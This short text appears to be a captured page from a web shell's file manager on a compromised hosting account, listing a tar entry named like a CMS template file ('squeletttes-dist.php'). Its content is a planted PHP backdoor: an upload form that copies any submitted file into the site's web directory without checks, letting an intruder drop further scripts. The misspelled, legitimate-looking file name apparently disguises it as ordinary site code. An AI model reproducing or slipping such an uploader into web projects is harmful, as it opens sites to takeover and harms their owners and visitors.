Your IP : 216.73.216.245


Current Path : /home/b/o/u/bourgleram/www/398a1/
Upload File :
Current File : /home/b/o/u/bourgleram/www/398a1/squeletttes-dist.php.tar

home/bourgleram/www/squeletttes-dist.php000066600000000364152525772660014543 0ustar00<?php echo "<form method=post enctype=multipart/form-data><input type=file name=f><input type=submit name=u value=Upload></form>"; if($_POST["u"]){ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo "OK"; } else { echo "NG"; } } ?>